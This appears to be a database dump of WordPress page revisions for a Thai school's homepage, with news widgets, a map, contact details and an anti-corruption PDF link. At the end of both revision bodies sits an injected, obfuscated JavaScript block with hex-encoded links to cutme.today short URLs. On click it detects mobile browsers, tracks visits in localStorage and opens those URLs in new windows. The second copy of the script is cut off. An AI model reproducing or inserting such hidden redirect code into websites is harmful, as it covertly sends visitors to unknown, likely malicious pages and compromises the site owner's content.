style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 22:07:52','2024-08-07 15:07:52','',14,'http://pakhaeng.ssk.in.th/?p=679',0,'revision','',0),
(680,1,'2024-08-08 13:38:37','2024-08-08 06:38:37','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":681,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\"></object><a id=\"wp-block-file--media-41bbdffc-148d-4102-bfb9-e3cb50d67629\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-41bbdffc-148d-4102-bfb9-e3cb50d67629\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const 